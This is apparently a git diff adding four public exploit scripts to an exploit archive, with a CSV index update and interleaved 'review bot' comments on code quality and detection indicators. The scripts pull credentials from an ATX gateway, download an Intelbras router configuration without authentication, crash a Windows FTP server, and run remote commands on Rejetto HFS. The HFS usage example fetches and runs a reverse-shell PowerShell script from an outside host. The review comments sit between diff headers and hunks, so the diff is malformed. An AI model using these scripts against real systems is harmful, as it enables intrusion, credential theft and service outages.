diff --git a/exploits/hardware/webapps/49124.py b/exploits/hardware/webapps/49124.py
new file mode 100755
index 000000000..63f5e940a
--- /dev/null
+++ b/exploits/hardware/webapps/49124.py
@@ -0,0 +1,45 @@
+# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
+# Date: 2020-11-20
+# Exploit Author: Zagros Bingol
+# Vendor Homepage: http://www.atx.com
+# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/
+# Version: 2.0 and earlier
+# Tested on: Debian 10 64bit
+
+-------------------------------------
+
+Endpoint:
+http://www.ip/domain.com/inc/user.ini
+
+--------------------------------------
+
+Proof-of-Concept:
+
+#!/usr/bin/python3
+#License: GNU General Public license v3.0
+#Author: Zagros Bingol(Zagrosbingol@outlook.com)
+
+
+import requests
+import re
+
+target = input("Target(ex:http://host): \n")
+port = input("Port: \n")
+
+
+def sploit(target, port):
+print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 -
+Credential Disclosure\n")
+r = requests.post(target + ":" + port + '/inc/user.ini')
+searching = re.findall(r"\[.{1,8}\]", str(r.text))
+print("Usernames:\n")
+print(", ".join(searching).replace("[", "").replace("]", ""))
+
+def hash():
+r = requests.post(target + '/inc/user.ini')
+searching = re.findall(r"([a-fA-F\d]{32})", str(r.text))
+print("Hashes:\n")
+print(", ".join(searching).replace("[", "").replace("]", ""))
+hash()
+
+sploit(target, port)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49126.py b/exploits/hardware/webapps/49126.py
new file mode 100755
index 000000000..23bd77eb6
--- /dev/null
+++ b/exploits/hardware/webapps/49126.py
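Review bot: `def hash():` shadows the builtin `hash` and, unlike the header of `sploit`, says nothing about what it extracts; the two regexes are the whole contract of this listing and deserve a comment such as `# [section] headers of the exposed user.ini are treated as usernames; 32 hex-digit tokens as password digests` (the meaning is inferred from `\[.{1,8}\]` and `([a-fA-F\d]{32})`, so phrase it as an assumption). The advisory prose (`Endpoint:`, the dashed separators, `Proof-of-Concept:`) sits uncommented inside a `.py` file, so as committed the listing does not parse as Python; moving that text into the `#` header block would make the file self-describing without changing the PoC. From the operator's side the useful indicator is already on the page: any request for `/inc/user.ini` from outside the management network should be denied at the web server and alerted on, since the file evidently contains account names and digests.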
@@ -0,0 +1,37 @@
+# Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass
+# Date: 27/11/2020
+# Exploit Author: Kaio Amaral
+# Vendor Homepage: https://www.intelbras.com/pt-br/
+# Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301K_v1.1.2.zip
+# Version: firmware version 1.1.2
+# Tested on: kali, android
+
+# POC
+
+# 1. nc host port, ex: nc 10.0.0.1 80
+# 2. GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0
+
+# Python3
+
+import socket
+from time import sleep
+
+def exploit(host, port=80):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    pay = "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0\n\n".encode()
+    s.connect((host, port))
+    s.send(pay)
+    sleep(0.2)
+    data = s.recv(17576)
+    if len(data) > 1000:
+        print("[+] Success.")
+        return data.decode()
+    print("[-] Failed. ")
+    exit()
+
+def file(data):
+    with open("router.cfg", "w") as file:
+        file.write(data[233:])
+    print("[+] File Successfully Written.")
+
+file(exploit("10.0.0.1"))
\ No newline at end of file
diff --git a/exploits/windows/remote/49127.py b/exploits/windows/remote/49127.py
new file mode 100755
index 000000000..3e454c91b
--- /dev/null
+++ b/exploits/windows/remote/49127.py
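Review bot: The socket `s` in `exploit` is never closed on either path, and the failure path calls `exit()` from inside a function, so the listing cannot be reused as a module; `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` around the body would release the descriptor and a `return None` (or a raised exception) would leave the exit decision to the caller. The slice `data[233:]` is an undocumented magic offset; it presumably skips the HTTP response headers of the device, so a comment like `# 233 = length of the router's HTTP response header block (observed on 1.1.2) -- TODO confirm` would stop the next reader from guessing. In `file`, the `with open(...) as file` target rebinds the function's own name inside its body, which is a small but confusing style choice. For operators, the indicator on this page is an unauthenticated `GET /cgi-bin/DownloadCfg/RouterCfm.cfg`; a successful response means the device configuration should be treated as disclosed and its credentials rotated.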
@@ -0,0 +1,35 @@
+# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
+# Google Dork: None
+# Date: 20.08.2020
+# Exploit Author: strider
+# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
+# Software Link: https://github.com/ik80/YATinyWinFTP
+# Tested on: Windows 10
+
+------------------------------[Description]---------------------------------
+
+This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end.
+The result it crashes
+
+ -----------------------------[Exploit]---------------------------------------------
+
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+import socket, sys
+
+target = (sys.argv[1], int(sys.argv[2]))
+buffer = b'A' * 272 + b'\x20'
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(target)
+print(s.recv(1024))
+s.send(buffer)
+s.close()
+
+ -----------------------------[how to run]-----------------------------
+
+C:\> TinyWinFTP.exe servepath port
+
+~$ python3 exploit.py targetip port
+
+Boom!
\ No newline at end of file
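Review bot: The description says the command "has a size of 256bytes", but the code builds `b'A' * 272 + b'\x20'`, which is 273 bytes; the header and the code should agree, e.g. `# 272 filler bytes plus one trailing space (273 bytes total)` next to the `buffer` line, or a corrected sentence in the Description block. As with the other listings in this commit, the Description and "how to run" prose is not commented out, so the file does not parse as Python unless the reader strips it; keeping that text under `#` would make the `.py` self-contained. The `socket` is closed only on the happy path; `with socket.socket(...) as s:` would cover the `connect` failure case too. No CVE or fixed version is recorded in the header, so a defender reading the index cannot tell whether a patched release of the server exists.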
@@ -0,0 +1,29 @@
+# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
+# Google Dork: intext:"httpfileserver 2.3"
+# Date: 28-11-2020
+# Remote: Yes
+# Exploit Author: Óscar Andreu
+# Vendor Homepage: http://rejetto.com/
+# Software Link: http://sourceforge.net/projects/hfs/
+# Version: 2.3.x
+# Tested on: Windows Server 2008 , Windows 8, Windows 7
+# CVE : CVE-2014-6287
+
+#!/usr/bin/python3
+
+# Usage : python3 Exploit.py
+# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
+
+import urllib3
+import sys
+import urllib.parse
+
+try:
+    http = urllib3.PoolManager()
+    url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
+    print(url)
+    response = http.request('GET', url)
+
+except Exception as ex:
+    print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
+    print(ex)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0d8798fae..e35b12e6f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
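Review bot: The `except Exception as ex:` wraps the whole body, so a missing argument, a DNS failure and an HTTP error all print the same "Usage" line; an explicit `if len(sys.argv) != 4:` guard before the `try` would separate usage errors from runtime errors, and the except could then be limited to the network exceptions it expects. `response` is assigned and never read, and the `#!/usr/bin/python3` on line 12 is inert because a shebang only counts on the first line of the file. The `# Usage :` line is also incomplete compared with the `# Example:` line below it and the usage string in the except branch. For detection, the request shape on the page is the documented CVE-2014-6287 pattern (`?search=%00{.+exec|` in the query string), which is what a web log or WAF rule for HFS 2.3.x should key on.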
@@ -18313,6 +18313,7 @@ id,file,description,date,author,type,platform,port
 49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
 49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
 49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
+49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43345,3 +43346,6 @@ id,file,description,date,author,type,platform,port
 49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
 49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
 49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,
+49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,
+49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows,
+49126,exploits/hardware/webapps/49126.py,"Intelbras Router RF 301K 1.1.2 - Authentication Bypass",2020-11-30,"Kaio Amaral",webapps,hardware,